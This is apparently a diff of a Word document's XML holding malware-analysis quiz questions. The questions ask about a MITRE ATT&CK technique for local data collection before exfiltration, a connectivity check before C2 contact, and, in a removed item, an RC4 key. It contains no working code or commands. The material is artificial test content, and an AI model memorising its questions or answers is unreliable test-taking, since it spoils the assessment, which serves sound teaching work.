+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>planning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the MITRE ATT&amp;CK </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>technique</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ID </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>collecting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>local</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>system</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>prior</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exfiltration</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CD96A27" wp14:editId="65E63111">
-            <wp:extent cx="5943600" cy="2843530"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1992132517" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="245D72A7" wp14:editId="2DC746F8">
+            <wp:extent cx="5943600" cy="2891155"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="601394182" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2411,7 +3173,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1992132517" name=""/>
+                    <pic:cNvPr id="601394182" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -2423,7 +3185,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2843530"/>
+                      <a:ext cx="5943600" cy="2891155"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2452,7 +3214,6 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Top of Form</w:t>
       </w:r>
     </w:p>
@@ -2489,7 +3250,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Q4</w:t>
+        <w:t>Q5</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2507,196 +3268,97 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>By</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>examining</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>provided</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>Recorded</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>Future</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>Triage</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>report</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>what</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> RC4 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>key</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>is</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>used</w:t>
+        <w:t>Following</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>execution</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>performs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>connectivity</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>check</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2723,34 +3385,106 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>decrypt</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>resolving</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>well-known</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>social-media</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>domain</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>before</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>contacting</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2777,16 +3511,160 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> base64-encoded </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>string</w:t>
+        <w:t xml:space="preserve"> C2. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Which</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>single</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>domain</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>does</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>it</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
